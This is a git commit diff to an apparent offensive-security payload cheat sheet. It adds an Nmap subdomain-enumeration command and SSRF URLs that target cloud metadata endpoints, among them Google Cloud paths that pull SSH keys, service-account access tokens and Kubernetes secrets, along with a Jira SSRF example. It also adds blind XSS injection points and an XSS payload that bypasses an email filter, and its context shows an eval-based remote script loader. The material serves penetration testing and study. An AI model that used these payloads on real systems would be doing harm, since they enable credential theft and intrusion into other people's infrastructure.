Blind XSS endpoint + SSRF Google + Nmap subdomains

2024-12-18 18:36:10 +00:00 · 2018-11-25 15:44:17 +01:00 · 2018-11-25 15:44:17 +01:00 · 928a454531
commit 928a454531
parent b34cff5a74
3 changed files with 30 additions and 0 deletions
--- a/Resources/Subdomains
+++ b/Resources/Subdomains
@ -12,6 +12,7 @@
  * Aquatone (Ruby and Go versions)
  * AltDNS
  * MassDNS
+  * Nmap
 * Subdomain take over
  * tko-subs
  * HostileSubBruteForcer
@ -144,6 +145,12 @@ DNS_RESOLVERS="./resolvers.txt"
 cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt
 ```

+### Using Nmap
+
+```powershell
+nmap -sn --script hostmap-crtsh host_to_scan.tld
+```
+
 ## Subdomain take over

 Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
--- a/injection/README.md
+++ b/injection/README.md
@ -330,6 +330,8 @@ http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
 http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
 ```

+E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
+
 ### SSRF URL for Google Cloud

 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
@ -356,6 +358,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```

+Interesting files to pull out:
+
+- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
+- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
+- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
+
 ### SSRF URL for Digital Ocean

 Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
@ -478,3 +486,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
 - [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
 - [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
+- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
--- a/injection/README.md
+++ b/injection/README.md
@ -325,6 +325,14 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
 - [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver)
 - [ezXSS - ssl](https://github.com/ssl/ezXSS)

+### Blind XSS endpoint
+
+- Contact forms
+- Ticket support
+- Referer Header
+  - Custom Site Analytics
+  - Administrative Panel logs
+
 ## Polyglot XSS

 Polyglot XSS - 0xsobky
@ -507,6 +515,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
 ```

+Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate))
+
+```javascript
+"><svg/onload=confirm(1)>"@x.y
+```
+
 Bypass document blacklist

 ```javascript